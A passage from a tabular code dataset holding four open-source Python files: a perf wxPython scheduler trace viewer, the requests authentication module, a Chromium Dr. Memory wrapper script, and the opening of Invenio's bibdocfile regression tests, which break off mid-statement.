repo_name (string, 6–100 chars) | path (string, 4–294 chars) | copies (string, 1–5 chars) | size (string, 4–6 chars) | content (string, 606–896k chars) | license (categorical, 15 values) |
---|---|---|---|---|---|
AttiJeong98/Solid_Kernel-Stock
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py
|
12980
|
5411
|
# SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError("You need to install the wxpython lib for this script")
class RootFrame(wx.Frame):
Y_OFFSET = 100
RECT_HEIGHT = 100
RECT_SPACE = 50
EVENT_MARKING_WIDTH = 5
def __init__(self, sched_tracer, title, parent = None, id = -1):
wx.Frame.__init__(self, parent, id, title)
(self.screen_width, self.screen_height) = wx.GetDisplaySize()
self.screen_width -= 10
self.screen_height -= 10
self.zoom = 0.5
self.scroll_scale = 20
self.sched_tracer = sched_tracer
self.sched_tracer.set_root_win(self)
(self.ts_start, self.ts_end) = sched_tracer.interval()
self.update_width_virtual()
self.nr_rects = sched_tracer.nr_rectangles() + 1
self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
# whole window panel
self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))
# scrollable container
self.scroll = wx.ScrolledWindow(self.panel)
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
self.scroll.EnableScrolling(True, True)
self.scroll.SetFocus()
# scrollable drawing area
self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Fit()
self.Fit()
self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)
self.txt = None
self.Show(True)
def us_to_px(self, val):
return val / (10 ** 3) * self.zoom
def px_to_us(self, val):
return (val / self.zoom) * (10 ** 3)
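# A quick sanity check on the two helpers above (a hedged sketch, assuming the
# default zoom of 0.5): us_to_px(4000) == 4000 / 1000 * 0.5 == 2, and
# px_to_us(2) == 2 / 0.5 * 1000 == 4000, so the conversions round-trip.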
def scroll_start(self):
(x, y) = self.scroll.GetViewStart()
return (x * self.scroll_scale, y * self.scroll_scale)
def scroll_start_us(self):
(x, y) = self.scroll_start()
return self.px_to_us(x)
def paint_rectangle_zone(self, nr, color, top_color, start, end):
offset_px = self.us_to_px(start - self.ts_start)
width_px = self.us_to_px(end - self.ts_start)
offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
width_py = RootFrame.RECT_HEIGHT
dc = self.dc
if top_color is not None:
(r, g, b) = top_color
top_color = wx.Colour(r, g, b)
brush = wx.Brush(top_color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
width_py -= RootFrame.EVENT_MARKING_WIDTH
offset_py += RootFrame.EVENT_MARKING_WIDTH
(r, g, b) = color
color = wx.Colour(r, g, b)
brush = wx.Brush(color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, width_py)
def update_rectangles(self, dc, start, end):
start += self.ts_start
end += self.ts_start
self.sched_tracer.fill_zone(start, end)
def on_paint(self, event):
dc = wx.PaintDC(self.scroll_panel)
self.dc = dc
width = min(self.width_virtual, self.screen_width)
(x, y) = self.scroll_start()
start = self.px_to_us(x)
end = self.px_to_us(x + width)
self.update_rectangles(dc, start, end)
def rect_from_ypixel(self, y):
y -= RootFrame.Y_OFFSET
rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
return -1
return rect
def update_summary(self, txt):
if self.txt:
self.txt.Destroy()
self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))
def on_mouse_down(self, event):
(x, y) = event.GetPositionTuple()
rect = self.rect_from_ypixel(y)
if rect == -1:
return
t = self.px_to_us(x) + self.ts_start
self.sched_tracer.mouse_down(rect, t)
def update_width_virtual(self):
self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)
def __zoom(self, x):
self.update_width_virtual()
(xpos, ypos) = self.scroll.GetViewStart()
xpos = self.us_to_px(x) / self.scroll_scale
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
self.Refresh()
def zoom_in(self):
x = self.scroll_start_us()
self.zoom *= 2
self.__zoom(x)
def zoom_out(self):
x = self.scroll_start_us()
self.zoom /= 2
self.__zoom(x)
def on_key_press(self, event):
key = event.GetRawKeyCode()
if key == ord("+"):
self.zoom_in()
return
if key == ord("-"):
self.zoom_out()
return
key = event.GetKeyCode()
(x, y) = self.scroll.GetViewStart()
if key == wx.WXK_RIGHT:
self.scroll.Scroll(x + 1, y)
elif key == wx.WXK_LEFT:
self.scroll.Scroll(x - 1, y)
elif key == wx.WXK_DOWN:
self.scroll.Scroll(x, y + 1)
elif key == wx.WXK_UP:
self.scroll.Scroll(x, y - 1)
|
gpl-2.0
|
shermanng10/superathletebuilder
|
env/lib/python2.7/site-packages/pip/_vendor/requests/auth.py
|
413
|
6794
|
# -*- coding: utf-8 -*-
"""
requests.auth
~~~~~~~~~~~~~
This module contains the authentication handlers for Requests.
"""
import os
import re
import time
import hashlib
from base64 import b64encode
from .compat import urlparse, str
from .cookies import extract_cookies_to_jar
from .utils import parse_dict_header, to_native_string
from .status_codes import codes
CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
CONTENT_TYPE_MULTI_PART = 'multipart/form-data'
def _basic_auth_str(username, password):
"""Returns a Basic Auth string."""
authstr = 'Basic ' + to_native_string(
b64encode(('%s:%s' % (username, password)).encode('latin1')).strip()
)
return authstr
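# A worked example (values computed by hand): for username 'user' and password
# 'pass', b64encode('user:pass') yields 'dXNlcjpwYXNz', so the returned header
# value is 'Basic dXNlcjpwYXNz'.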
class AuthBase(object):
"""Base class that all auth implementations derive from"""
def __call__(self, r):
raise NotImplementedError('Auth hooks must be callable.')
class HTTPBasicAuth(AuthBase):
"""Attaches HTTP Basic Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
def __call__(self, r):
r.headers['Authorization'] = _basic_auth_str(self.username, self.password)
return r
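# A minimal usage sketch (assuming the full requests package is installed; the
# URL is hypothetical):
#
#   import requests
#   requests.get('https://example.invalid/protected',
#                auth=HTTPBasicAuth('user', 'pass'))
#
# Passing a plain ('user', 'pass') tuple as auth is shorthand for the same.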
class HTTPProxyAuth(HTTPBasicAuth):
"""Attaches HTTP Proxy Authentication to a given Request object."""
def __call__(self, r):
r.headers['Proxy-Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPDigestAuth(AuthBase):
"""Attaches HTTP Digest Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
self.last_nonce = ''
self.nonce_count = 0
self.chal = {}
self.pos = None
self.num_401_calls = 1
def build_digest_header(self, method, url):
realm = self.chal['realm']
nonce = self.chal['nonce']
qop = self.chal.get('qop')
algorithm = self.chal.get('algorithm')
opaque = self.chal.get('opaque')
if algorithm is None:
_algorithm = 'MD5'
else:
_algorithm = algorithm.upper()
# lambdas assume digest modules are imported at the top level
hash_utf8 = None
if _algorithm == 'MD5' or _algorithm == 'MD5-SESS':
def md5_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.md5(x).hexdigest()
hash_utf8 = md5_utf8
elif _algorithm == 'SHA':
def sha_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.sha1(x).hexdigest()
hash_utf8 = sha_utf8
KD = lambda s, d: hash_utf8("%s:%s" % (s, d))
if hash_utf8 is None:
return None
# XXX not implemented yet
entdig = None
p_parsed = urlparse(url)
#: path is request-uri defined in RFC 2616 which should not be empty
path = p_parsed.path or "/"
if p_parsed.query:
path += '?' + p_parsed.query
A1 = '%s:%s:%s' % (self.username, realm, self.password)
A2 = '%s:%s' % (method, path)
HA1 = hash_utf8(A1)
HA2 = hash_utf8(A2)
if nonce == self.last_nonce:
self.nonce_count += 1
else:
self.nonce_count = 1
ncvalue = '%08x' % self.nonce_count
s = str(self.nonce_count).encode('utf-8')
s += nonce.encode('utf-8')
s += time.ctime().encode('utf-8')
s += os.urandom(8)
cnonce = (hashlib.sha1(s).hexdigest()[:16])
if _algorithm == 'MD5-SESS':
HA1 = hash_utf8('%s:%s:%s' % (HA1, nonce, cnonce))
if qop is None:
respdig = KD(HA1, "%s:%s" % (nonce, HA2))
elif qop == 'auth' or 'auth' in qop.split(','):
noncebit = "%s:%s:%s:%s:%s" % (
nonce, ncvalue, cnonce, 'auth', HA2
)
respdig = KD(HA1, noncebit)
else:
# XXX handle auth-int.
return None
self.last_nonce = nonce
# XXX should the partial digests be encoded too?
base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
'response="%s"' % (self.username, realm, nonce, path, respdig)
if opaque:
base += ', opaque="%s"' % opaque
if algorithm:
base += ', algorithm="%s"' % algorithm
if entdig:
base += ', digest="%s"' % entdig
if qop:
base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce)
return 'Digest %s' % (base)
def handle_redirect(self, r, **kwargs):
"""Reset num_401_calls counter on redirects."""
if r.is_redirect:
self.num_401_calls = 1
def handle_401(self, r, **kwargs):
"""Takes the given response and tries digest-auth, if needed."""
if self.pos is not None:
# Rewind the file position indicator of the body to where
# it was to resend the request.
r.request.body.seek(self.pos)
num_401_calls = getattr(self, 'num_401_calls', 1)
s_auth = r.headers.get('www-authenticate', '')
if 'digest' in s_auth.lower() and num_401_calls < 2:
self.num_401_calls += 1
pat = re.compile(r'digest ', flags=re.IGNORECASE)
self.chal = parse_dict_header(pat.sub('', s_auth, count=1))
# Consume content and release the original connection
# to allow our new request to reuse the same one.
r.content
r.raw.release_conn()
prep = r.request.copy()
extract_cookies_to_jar(prep._cookies, r.request, r.raw)
prep.prepare_cookies(prep._cookies)
prep.headers['Authorization'] = self.build_digest_header(
prep.method, prep.url)
_r = r.connection.send(prep, **kwargs)
_r.history.append(r)
_r.request = prep
return _r
self.num_401_calls = 1
return r
def __call__(self, r):
# If we have a saved nonce, skip the 401
if self.last_nonce:
r.headers['Authorization'] = self.build_digest_header(r.method, r.url)
try:
self.pos = r.body.tell()
except AttributeError:
# In the case of HTTPDigestAuth being reused and the body of
# the previous request was a file-like object, pos has the
# file position of the previous body. Ensure it's set to
# None.
self.pos = None
r.register_hook('response', self.handle_401)
r.register_hook('response', self.handle_redirect)
return r
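# A minimal usage sketch for digest auth (assuming the full requests package;
# the URL is hypothetical). The first request draws a 401 challenge, which the
# handle_401() hook answers with a freshly built Digest header:
#
#   import requests
#   requests.get('https://example.invalid/protected',
#                auth=HTTPDigestAuth('user', 'pass'))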
|
mit
|
gavinp/chromium
|
tools/valgrind/browser_wrapper_win.py
|
80
|
1636
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import os
import re
import sys
import subprocess
# TODO(timurrrr): we may use it on POSIX too to avoid code duplication once we
# support layout_tests, remove Dr. Memory specific code and verify it works
# on a "clean" Mac.
testcase_name = None
for arg in sys.argv:
m = re.match("\-\-test\-name=(.*)", arg)
if m:
assert testcase_name is None
testcase_name = m.groups()[0]
# arg #0 is the path to this python script
cmd_to_run = sys.argv[1:]
# TODO(timurrrr): this is Dr. Memory-specific
# Usually, we pass "-logdir" "foo\bar\spam path" args to Dr. Memory.
# To group reports per UI test, we want to put the reports for each test into a
# separate directory. This code can be simplified when we have
# http://code.google.com/p/drmemory/issues/detail?id=684 fixed.
logdir_idx = cmd_to_run.index("-logdir")
old_logdir = cmd_to_run[logdir_idx + 1]
wrapper_pid = str(os.getpid())
# On Windows, there is a chance of PID collision. We avoid it by appending the
# number of entries in the logdir at the end of wrapper_pid.
# This number is monotonic and we can't have two simultaneously running wrappers
# with the same PID.
wrapper_pid += "_%d" % len(glob.glob(old_logdir + "\\*"))
cmd_to_run[logdir_idx + 1] += "\\testcase.%s.logs" % wrapper_pid
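# For example (hypothetical values): a wrapper with PID 1234 and an empty
# logdir turns '-logdir c:\logs' into '-logdir c:\logs\testcase.1234_0.logs'.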
os.makedirs(cmd_to_run[logdir_idx + 1])
if testcase_name:
f = open(old_logdir + "\\testcase.%s.name" % wrapper_pid, "w")
print >>f, testcase_name
f.close()
exit(subprocess.call(cmd_to_run))
|
bsd-3-clause
|
chokribr/inveniotest
|
modules/bibdocfile/lib/bibdocfile_regression_tests.py
|
10
|
30584
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011, 2012, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibDocFile Regression Test Suite."""
__revision__ = "$Id$"
import shutil
import os
from invenio.testutils import InvenioTestCase
from invenio.testutils import make_test_suite, run_test_suite
from invenio.bibdocfile import BibRecDocs, BibRelation, MoreInfo, \
check_bibdoc_authorization, bibdocfile_url_p, guess_format_from_url, CFG_HAS_MAGIC, \
Md5Folder, calculate_md5, calculate_md5_external
from invenio.dbquery import run_sql
from invenio.access_control_config import CFG_WEBACCESS_WARNING_MSGS
from invenio.config import \
CFG_SITE_URL, \
CFG_PREFIX, \
CFG_BIBDOCFILE_FILEDIR, \
CFG_SITE_RECORD, \
CFG_WEBDIR, \
CFG_TMPDIR, \
CFG_PATH_MD5SUM
import invenio.template
from datetime import datetime
import time
class BibDocFsInfoTest(InvenioTestCase):
"""Regression tests about the table bibdocfsinfo"""
def setUp(self):
self.my_bibrecdoc = BibRecDocs(2)
self.unique_name = self.my_bibrecdoc.propose_unique_docname('file')
self.my_bibdoc = self.my_bibrecdoc.add_new_file(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', docname=self.unique_name)
self.my_bibdoc_id = self.my_bibdoc.id
def tearDown(self):
self.my_bibdoc.expunge()
def test_hard_delete(self):
"""bibdocfile - test correct update of bibdocfsinfo when hard-deleting"""
self.assertEqual(run_sql("SELECT MAX(version) FROM bibdocfsinfo WHERE id_bibdoc=%s", (self.my_bibdoc_id, ))[0][0], 1)
self.assertEqual(run_sql("SELECT last_version FROM bibdocfsinfo WHERE id_bibdoc=%s AND version=1 AND format='.jpg'", (self.my_bibdoc_id, ))[0][0], True)
self.my_bibdoc.add_file_new_version(CFG_PREFIX + '/lib/webtest/invenio/test.gif')
self.assertEqual(run_sql("SELECT MAX(version) FROM bibdocfsinfo WHERE id_bibdoc=%s", (self.my_bibdoc_id, ))[0][0], 2)
self.assertEqual(run_sql("SELECT last_version FROM bibdocfsinfo WHERE id_bibdoc=%s AND version=2 AND format='.gif'", (self.my_bibdoc_id, ))[0][0], True)
self.assertEqual(run_sql("SELECT last_version FROM bibdocfsinfo WHERE id_bibdoc=%s AND version=1 AND format='.jpg'", (self.my_bibdoc_id, ))[0][0], False)
self.my_bibdoc.delete_file('.gif', 2)
self.assertEqual(run_sql("SELECT MAX(version) FROM bibdocfsinfo WHERE id_bibdoc=%s", (self.my_bibdoc_id, ))[0][0], 1)
self.assertEqual(run_sql("SELECT last_version FROM bibdocfsinfo WHERE id_bibdoc=%s AND version=1 AND format='.jpg'", (self.my_bibdoc_id, ))[0][0], True)
class BibDocFileGuessFormat(InvenioTestCase):
"""Regression tests for guess_format_from_url"""
def test_guess_format_from_url_local_no_ext(self):
"""bibdocfile - guess_format_from_url(), local URL, no extension"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'test')), '.bin')
if CFG_HAS_MAGIC:
def test_guess_format_from_url_local_no_ext_with_magic(self):
"""bibdocfile - guess_format_from_url(), local URL, no extension, with magic"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'testgif')), '.gif')
else:
def test_guess_format_from_url_local_no_ext_with_magic(self):
"""bibdocfile - guess_format_from_url(), local URL, no extension, no magic"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'testgif')), '.bin')
def test_guess_format_from_url_local_unknown_ext(self):
"""bibdocfile - guess_format_from_url(), local URL, unknown extension"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'test.foo')), '.foo')
def test_guess_format_from_url_local_known_ext(self):
"""bibdocfile - guess_format_from_url(), local URL, unknown extension"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'test.gif')), '.gif')
def test_guess_format_from_url_remote_no_ext(self):
"""bibdocfile - guess_format_from_url(), remote URL, no extension"""
self.assertEqual(guess_format_from_url(CFG_SITE_URL + '/img/test'), '.bin')
if CFG_HAS_MAGIC:
def test_guess_format_from_url_remote_no_ext_with_magic(self):
"""bibdocfile - guess_format_from_url(), remote URL, no extension, with magic"""
self.assertEqual(guess_format_from_url(CFG_SITE_URL + '/img/testgif'), '.gif')
else:
def test_guess_format_from_url_remote_no_ext_with_magic(self):
"""bibdocfile - guess_format_from_url(), remote URL, no extension, no magic"""
self.failUnless(guess_format_from_url(CFG_SITE_URL + '/img/testgif') in ('.bin', '.gif'))
if CFG_HAS_MAGIC:
def test_guess_format_from_url_remote_unknown_ext(self):
"""bibdocfile - guess_format_from_url(), remote URL, unknown extension, with magic"""
self.assertEqual(guess_format_from_url(CFG_SITE_URL + '/img/test.foo'), '.gif')
else:
def test_guess_format_from_url_remote_unknown_ext(self):
"""bibdocfile - guess_format_from_url(), remote URL, unknown extension, no magic"""
self.failUnless(guess_format_from_url(CFG_SITE_URL + '/img/test.foo') in ('.bin', '.gif'))
def test_guess_format_from_url_remote_known_ext(self):
"""bibdocfile - guess_format_from_url(), remote URL, known extension"""
self.assertEqual(guess_format_from_url(CFG_SITE_URL + '/img/test.gif'), '.gif')
def test_guess_format_from_url_local_gpl_license(self):
local_path = os.path.join(CFG_TMPDIR, 'LICENSE')
print >> open(local_path, 'w'), """
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
[...]
"""
try:
if CFG_HAS_MAGIC:
self.assertEqual(guess_format_from_url(local_path), '.txt')
else:
self.assertEqual(guess_format_from_url(local_path), '.bin')
finally:
os.remove(local_path)
class BibRecDocsTest(InvenioTestCase):
"""regression tests about BibRecDocs"""
def test_BibRecDocs(self):
"""bibdocfile - BibRecDocs functions"""
my_bibrecdoc = BibRecDocs(2)
#add bibdoc
my_bibrecdoc.add_new_file(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', 'Main', 'img_test', False, 'test add new file', 'test', '.jpg')
my_bibrecdoc.add_bibdoc(doctype='Main', docname='file', never_fail=False)
self.assertEqual(len(my_bibrecdoc.list_bibdocs()), 3)
my_added_bibdoc = my_bibrecdoc.get_bibdoc('file')
#add bibdocfile in empty bibdoc
my_added_bibdoc.add_file_new_version(CFG_PREFIX + '/lib/webtest/invenio/test.gif', \
description= 'added in empty bibdoc', comment=None, docformat=None, flags=['PERFORM_HIDE_PREVIOUS'])
#propose unique docname
self.assertEqual(my_bibrecdoc.propose_unique_docname('file'), 'file_2')
#has docname
self.assertEqual(my_bibrecdoc.has_docname_p('file'), True)
#merge 2 bibdocs
my_bibrecdoc.merge_bibdocs('img_test', 'file')
self.assertEqual(len(my_bibrecdoc.get_bibdoc("img_test").list_all_files()), 2)
#check file exists
self.assertEqual(my_bibrecdoc.check_file_exists(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', '.jpg'), True)
#get bibdoc names
# we cannot rely on the order!
names = set([my_bibrecdoc.get_bibdoc_names('Main')[0], my_bibrecdoc.get_bibdoc_names('Main')[1]])
self.assertTrue('0104007_02' in names)
self.assertTrue('img_test' in names)
#get total size
self.assertEqual(my_bibrecdoc.get_total_size(), 1647591)
#get total size latest version
self.assertEqual(my_bibrecdoc.get_total_size_latest_version(), 1647591)
#display
#value = my_bibrecdoc.display(docname='img_test', version='', doctype='', ln='en', verbose=0, display_hidden=True)
#self.assert_("<small><b>Main</b>" in value)
#get xml 8564
value = my_bibrecdoc.get_xml_8564()
self.assert_('/'+ CFG_SITE_RECORD +'/2/files/img_test.jpg</subfield>' in value)
#check duplicate docnames
self.assertEqual(my_bibrecdoc.check_duplicate_docnames(), True)
def tearDown(self):
my_bibrecdoc = BibRecDocs(2)
#delete
my_bibrecdoc.delete_bibdoc('img_test')
my_bibrecdoc.delete_bibdoc('file')
my_bibrecdoc.delete_bibdoc('test')
class BibDocsTest(InvenioTestCase):
"""regression tests about BibDocs"""
def test_BibDocs(self):
"""bibdocfile - BibDocs functions"""
#add file
my_bibrecdoc = BibRecDocs(2)
timestamp1 = datetime(*(time.strptime("2011-10-09 08:07:06", "%Y-%m-%d %H:%M:%S")[:6]))
my_bibrecdoc.add_new_file(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', 'Main', 'img_test', False, 'test add new file', 'test', '.jpg', modification_date=timestamp1)
my_new_bibdoc = my_bibrecdoc.get_bibdoc("img_test")
value = my_bibrecdoc.list_bibdocs()
self.assertEqual(len(value), 2)
#get total file (bibdoc)
self.assertEqual(my_new_bibdoc.get_total_size(), 91750)
#get recid
self.assertEqual(my_new_bibdoc.bibrec_links[0]["recid"], 2)
#change name
my_new_bibdoc.change_name(2, 'new_name')
#get docname
my_bibrecdoc = BibRecDocs(2)
self.assertEqual(my_bibrecdoc.get_docname(my_new_bibdoc.id), 'new_name')
#get type
self.assertEqual(my_new_bibdoc.get_type(), 'Main')
#get id
self.assert_(my_new_bibdoc.get_id() > 80)
#set status
my_new_bibdoc.set_status('new status')
#get status
self.assertEqual(my_new_bibdoc.get_status(), 'new status')
#get base directory
self.assert_(my_new_bibdoc.get_base_dir().startswith(CFG_BIBDOCFILE_FILEDIR))
#get file number
self.assertEqual(my_new_bibdoc.get_file_number(), 1)
#add file new version
timestamp2 = datetime(*(time.strptime("2010-09-08 07:06:05", "%Y-%m-%d %H:%M:%S")[:6]))
my_new_bibdoc.add_file_new_version(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', description= 'the new version', comment=None, docformat=None, flags=["PERFORM_HIDE_PREVIOUS"], modification_date=timestamp2)
self.assertEqual(my_new_bibdoc.list_versions(), [1, 2])
#revert
timestamp3 = datetime.now()
time.sleep(2) # so we can see a difference between now() and the time of the revert
my_new_bibdoc.revert(1)
self.assertEqual(my_new_bibdoc.list_versions(), [1, 2, 3])
self.assertEqual(my_new_bibdoc.get_description('.jpg', version=3), 'test add new file')
#get total size latest version
self.assertEqual(my_new_bibdoc.get_total_size_latest_version(), 91750)
#get latest version
self.assertEqual(my_new_bibdoc.get_latest_version(), 3)
#list latest files
self.assertEqual(len(my_new_bibdoc.list_latest_files()), 1)
self.assertEqual(my_new_bibdoc.list_latest_files()[0].get_version(), 3)
#list version files
self.assertEqual(len(my_new_bibdoc.list_version_files(1, list_hidden=True)), 1)
#display # No Display facility inside of an object !
# value = my_new_bibdoc.display(version='', ln='en', display_hidden=True)
# self.assert_('>test add new file<' in value)
#format already exist
self.assertEqual(my_new_bibdoc.format_already_exists_p('.jpg'), True)
#get file
self.assertEqual(my_new_bibdoc.get_file('.jpg', version='1').get_version(), 1)
#set description
my_new_bibdoc.set_description('new description', '.jpg', version=1)
#get description
self.assertEqual(my_new_bibdoc.get_description('.jpg', version=1), 'new description')
#set comment
my_new_bibdoc.set_comment('new comment', '.jpg', version=1)
#get comment
self.assertEqual(my_new_bibdoc.get_comment('.jpg', version=1), 'new comment')
#get history
assert len(my_new_bibdoc.get_history()) > 0
#check modification date
self.assertEqual(my_new_bibdoc.get_file('.jpg', version=1).md, timestamp1)
self.assertEqual(my_new_bibdoc.get_file('.jpg', version=2).md, timestamp2)
assert my_new_bibdoc.get_file('.jpg', version=3).md > timestamp3
#delete file
my_new_bibdoc.delete_file('.jpg', 2)
#list all files
self.assertEqual(len(my_new_bibdoc.list_all_files()), 2)
#delete file
my_new_bibdoc.delete_file('.jpg', 3)
#add new format
timestamp4 = datetime(*(time.strptime("2012-11-10 09:08:07", "%Y-%m-%d %H:%M:%S")[:6]))
my_new_bibdoc.add_file_new_format(CFG_PREFIX + '/lib/webtest/invenio/test.gif', version=None, description=None, comment=None, docformat=None, modification_date=timestamp4)
self.assertEqual(len(my_new_bibdoc.list_all_files()), 2)
#check modification time
self.assertEqual(my_new_bibdoc.get_file('.jpg', version=1).md, timestamp1)
self.assertEqual(my_new_bibdoc.get_file('.gif', version=1).md, timestamp4)
#change the format name
my_new_bibdoc.change_docformat('.gif', '.gif;icon-640')
self.assertEqual(my_new_bibdoc.format_already_exists_p('.gif'), False)
self.assertEqual(my_new_bibdoc.format_already_exists_p('.gif;icon-640'), True)
#delete file
my_new_bibdoc.delete_file('.jpg', 1)
#delete file
my_new_bibdoc.delete_file('.gif;icon-640', 1)
#empty bibdoc
self.assertEqual(my_new_bibdoc.empty_p(), True)
#hidden?
self.assertEqual(my_new_bibdoc.hidden_p('.jpg', version=1), False)
#hide
my_new_bibdoc.set_flag('HIDDEN', '.jpg', version=1)
#hidden?
self.assertEqual(my_new_bibdoc.hidden_p('.jpg', version=1), True)
#add and get icon
my_new_bibdoc.add_icon( CFG_PREFIX + '/lib/webtest/invenio/icon-test.gif', modification_date=timestamp4)
my_bibrecdoc = BibRecDocs(2)
value = my_bibrecdoc.get_bibdoc("new_name")
self.assertEqual(value.get_icon().docid, my_new_bibdoc.get_icon().docid)
self.assertEqual(value.get_icon().version, my_new_bibdoc.get_icon().version)
self.assertEqual(value.get_icon().format, my_new_bibdoc.get_icon().format)
#check modification time
self.assertEqual(my_new_bibdoc.get_icon().md, timestamp4)
#delete icon
my_new_bibdoc.delete_icon()
#get icon
self.assertEqual(my_new_bibdoc.get_icon(), None)
#delete
my_new_bibdoc.delete()
self.assertEqual(my_new_bibdoc.deleted_p(), True)
#undelete
my_new_bibdoc.undelete(previous_status='', recid=2)
#expunging
my_new_bibdoc.expunge()
my_bibrecdoc.build_bibdoc_list()
self.failIf('new_name' in my_bibrecdoc.get_bibdoc_names())
self.failUnless(my_bibrecdoc.get_bibdoc_names())
def tearDown(self):
my_bibrecdoc = BibRecDocs(2)
#delete
my_bibrecdoc.delete_bibdoc('img_test')
my_bibrecdoc.delete_bibdoc('new_name')
class BibRelationTest(InvenioTestCase):
""" regression tests for BibRelation"""
def test_RelationCreation_Version(self):
"""
Testing relations between particular versions of a document.
We create two relations differing only in the BibDoc version
number and verify that they are indeed different (store different data).
"""
rel1 = BibRelation.create(bibdoc1_id = 10, bibdoc2_id=12,
bibdoc1_ver = 1, bibdoc2_ver = 1,
rel_type = "some_rel")
rel2 = BibRelation.create(bibdoc1_id = 10, bibdoc2_id=12,
bibdoc1_ver = 1, bibdoc2_ver = 2,
rel_type = "some_rel")
rel1["key1"] = "value1"
rel1["key2"] = "value2"
rel2["key1"] = "value3"
# now testing the retrieval of data
new_rel1 = BibRelation(bibdoc1_id = 10, bibdoc2_id = 12,
rel_type = "some_rel", bibdoc1_ver = 1,
bibdoc2_ver = 1)
new_rel2 = BibRelation(bibdoc1_id = 10, bibdoc2_id = 12,
rel_type = "some_rel", bibdoc1_ver = 1,
bibdoc2_ver = 2)
self.assertEqual(new_rel1["key1"], "value1")
self.assertEqual(new_rel1["key2"], "value2")
self.assertEqual(new_rel2["key1"], "value3")
# now testing the deletion of relations
new_rel1.delete()
new_rel2.delete()
newer_rel1 = BibRelation.create(bibdoc1_id = 10, bibdoc2_id=12,
bibdoc1_ver = 1, bibdoc2_ver = 1,
rel_type = "some_rel")
newer_rel2 = BibRelation.create(bibdoc1_id = 10, bibdoc2_id=12,
